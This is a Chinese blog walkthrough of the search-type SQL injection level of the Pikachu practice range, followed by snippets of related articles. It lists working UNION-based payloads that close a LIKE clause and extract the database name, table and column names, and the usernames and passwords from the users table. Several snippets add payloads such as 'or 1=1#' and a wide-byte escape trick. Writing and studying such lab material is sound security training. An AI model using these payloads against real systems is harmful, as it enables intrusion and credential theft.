Pikachu靶场-SQL注入-搜索型注入过关步骤

最新推荐文章于 2024-03-28 17:06:02 发布
最新推荐文章于 2024-03-28 17:06:02 发布
阅读量939 收藏 10
点赞数 1
分类专栏: # 渗透靶场 文章标签: sql 数据库 mysql SQL注入 搜索型注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44257023/article/details/125820450
版权

Pikachu靶场-SQL注入-搜索型注入过关步骤

首先要明白MySQL数据库模糊搜索的语句,like ‘常%’、like ‘%常’、like ‘%常%’ 这个几个,这里就不详说这个语句了

判断注入点

不知道怎么写的代码以下几种语句都可以试试

这关我用的搜索型注入语句:
v%’ and -1=-1 – bbq

网上查到的搜索型注入语句:
‘and 1=1 and ‘%’=’

%’ and 1=1–’

%’ and 1=1 and ‘%’=’
单引号闭合的时候报了一个错误,这说明大概是 %xx%、xx%吧
在这里插入图片描述
直接上过程动图吧,看不清点击图片放大查看:
在这里插入图片描述

判断有多少个字段数

这关有4个,直接上动图:
在这里插入图片描述

展示显错位

在这里插入图片描述

查询当前数据库

version()查看数据库版本 ,database()查看当前数据库

v%' union select version(),database(),33 -- bbq

在这里插入图片描述

查询出数据库中的所有表

如果表多页面展示不全,可以使用 LIMIT 一页页展示,也可以使用group_concat() 拼接函数将显示的字段名包起来展示

v%' union select table_name,22,33 from information_schema.tables where table_schema=database() -- bbq

在这里插入图片描述

查询指定的表中的列名

查询出表名下一步就是,查询字段也就是列名称

v%' union select column_name,22,33 from information_schema.columns where table_schema='pikachu' and table_name='users' -- bbq

在这里插入图片描述

查询数据

当经过以上步骤,已经知道了数据库名、表名、字段名,那么就可以查询我们需要的数据了

v%' union select username,password,33 from users -- bbq

在这里插入图片描述

常家壮
关注
专栏目录
SQL注入——搜索注入
zjdda的博客
05-30 7375
搜索注入原理 语句构造
Pikachu靶场-SQL Inject
qq_53083285的博客
11-10 5245
Pikachu靶场Sql
SQL注入系列之PHP+Mysql手动注入(三)----搜索(POST/GET)
热门推荐
fendo
02-26 1万+
一、搜索注入简介与原理 1)简介 一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在: 2)原理 $sql="select * from user where password like '%$pwd%' order by pa
pikachu SQL注入搜索
ANYOUZHEN的博客
05-09 235
观察后端代码,尝试构造合法闭合 payload:xxxx%' or 1=1# 成功注入,#在MySQL数据库中起到注释的作用,可以去掉后面的代码
SQL注入搜索注入
qxx5203的博客
07-22 2650
SQL语句selectusername,idfromadminwhereusernamelike'%$name%'"%"匹配任何字符,"like"的意思就是像,"$"变量。正常回显,却无法判断字段数,也无法查看报错位。数据库表的信息(blog,heroes,movies,进入靶场后出现此界面,在登录界面输入。8页面显示不正常,发现最大正常位是。数据库列的信息id,num,判断一下是数字还是字符。账号密码错误或用户未注册!搜索框内输入a正常回显。...
SQL注入 (中级篇)搜索注入
weixin_41472455的博客
05-06 712
搜索注入: 其实对于初学SQL注入,并不需要区分注入。 但是要理解搜索注入,首先需要理解SQL搜索语句,举个例子 我们希望从 "Persons" 表中选取居住在包含 "lon" 的城市里的人: 我们可以使用下面的 SELECT 语句: SELECT * FROM Persons WHERE City LIKE '%lon%' 通常来讲 SQL注入只是后台的 数据库查询语...
pikachu靶场SQL注入.docx
09-13
Pikachu靶场SQL注入中,我们可以使用FireFox浏览器或BurpSuite工具来测试字符注入,通过测试,我们可以确定注入点。 Pikachu靶场SQL注入是非常危险的一种攻击手段,Web开发者应该采取措施来防止SQL注入攻击。
PIKACHU靶场 ——字符和数字SQL注入练习
PICACHU+++的博客
04-03 881
进入靶场可以看见一个输入框,所以现在里面判断注入点类,在输入框中输入了1'后,报错,并且显示到URL中,判断参数提交方式为GET传参在URL栏中输入了一下语句,判断为字符SQL注入漏洞1' #报错1'and'1'='1 #未报错1'and'1'='2 #未报错综上为字符SQL注入漏洞。
皮卡丘靶场-sql注入详解
Mr_helloword的博客
07-31 1810
皮卡丘靶场-sql注入 数字注入 这里为post传参,所以我们需要抓包 抓包后发现id,我们一般在后面输入 ’ " \来测试有无注入,发现有sql语句报错,而且没有数字1,这和题目提示的数字注入一样 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200730155448929.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNz
pikachu 靶场--token防爆破
renyizou的博客
06-18 1020
通过测试(抓包),发现token会变,所以不能用以前简单的爆破去跑字典了,会提示错误的token 所以需要在第n次爆破的时候,使用第n-1次返回包中携带的token,才能通过验证 (至于游客身份登录的token哪里来,其实在你第一次点开链接的时候,服务器给你的返回包里就已经有一个token了) 开始爆破 已知用户名是admin 先随便输一下抓个包 发到repeater,go一下,获得本次返回包中携带的token 再转发到inturder 标记下需要跑的参数,使用鱼叉模...
SQL注入搜索盲注(手工注入
qxx5203的博客
07-22 1233
看看有没有注入点,页面异常。也尝试了其他手工注入的方法,仍然异常。判断一下是数字还是字符,页面异常。6页面显示不正常,发现最大正常位是5。,我们在搜索框中发现注入点。搜索框内输入a正常回显。进入靶场后出现此界面,在。用户名输入1’,密码任意。数据库列的信息id,...
pikachu靶场SQL注入
最新发布
2201_75766364的博客
03-28 1013
程序员在编写web程序时,没有对客户端提交的参数进行严格的过滤和判断。用户可以修改参数或数据,并传递至服务器端,导致服务端拼接了伪造的SQL查询语句,服务端连接数据库,并将伪造的sql语句发送给数据库服务端执行,数据库sql语句的执行结 果,返回给了服务端,服务端又将结果返回给了客户端,从而获取到敏感信息,甚至执行危险的代码或 系统命令。简单来说就是:注入产生的原因是接受相关参数未经处理直接带入数据库查询操作。
Pikachu搜索注入
xdjxi的博客
03-07 855
一、原理 “%”匹配任何字符,“like”的意思就是像,这句SQL的语句就是基于用户输入的pwd在users表中找到相应的password,正常用户当然会输入例如admin,ckse等等。 构造对应的闭合,闭合前面的单引号和百分号,注释后面的百分号和单引号。构造的payload如下 xxxx%’ or 1=1# 二、操作 打开进入界面: 然后我们可以输入’ and 1=1 order by x#通过order by x来确定字段数,时返回了正常页面然后我们可以输入’ and 1...
Pikachu(皮卡丘)靶场SQL注入
剁椒鱼头没剁椒的博客
12-14 5154
1)宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个 字符是一个汉字(前一个 ascii 码要大于 128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql 会调用转义函数,将单引号变为’,其中\的十 六进制是%5c,mysql 的 GBK 编码,会认为%df%5c 是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。输入kobe’ and 1=1#的时候页面正常,并且kobe’ and 1=2#页面不正常,证明使用单引号闭合。
pikachu搜索注入
weixin_43622525的博客
03-07 7014
目录 pikachu 简介 搭建 windows Docker SQL注入 搜索注入 pikachu 简介 Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意。 搭建 windows 搭建phpstudy环境,将pikachu解压在网站根目录进行搭建。 Docker docker build -t "pikachu" . docker run
Pikachu靶场SQL-Inject之搜索注入
witwitwiter的博客
04-21 563
Pikachu靶场SQL-Inject之搜索注入 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 数据库注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击着可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一种漏洞。 实验步骤 1.前期工作 先将Proxy中的intercept关闭,使其不进行拦截,让数据通过监听的端口。 2.注入点探测 在字符注入中看到输入框,里面能够输入字符串。这里输
pikachu 漏洞平台sql注入搜索注入
安全界的彭于晏的博客
06-26 497
http://192.168.66.4/pikachu/vul/sqli/sqli_search.php?name=&submit=%E6%90%9C%E7%B4%A2 随便搜一下得到URL 找找闭合 判断一下是否存在注入 加了 ’ 之后报出数据库错误 说明执行了 数据库查询语句 构造PAylodad 先查一下主查询字段数 1、找闭合 看下报错信息 这里有个百分号 加个百分号试一下 到4报错 看来 是有三个主查询字段 构造payload union select database
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值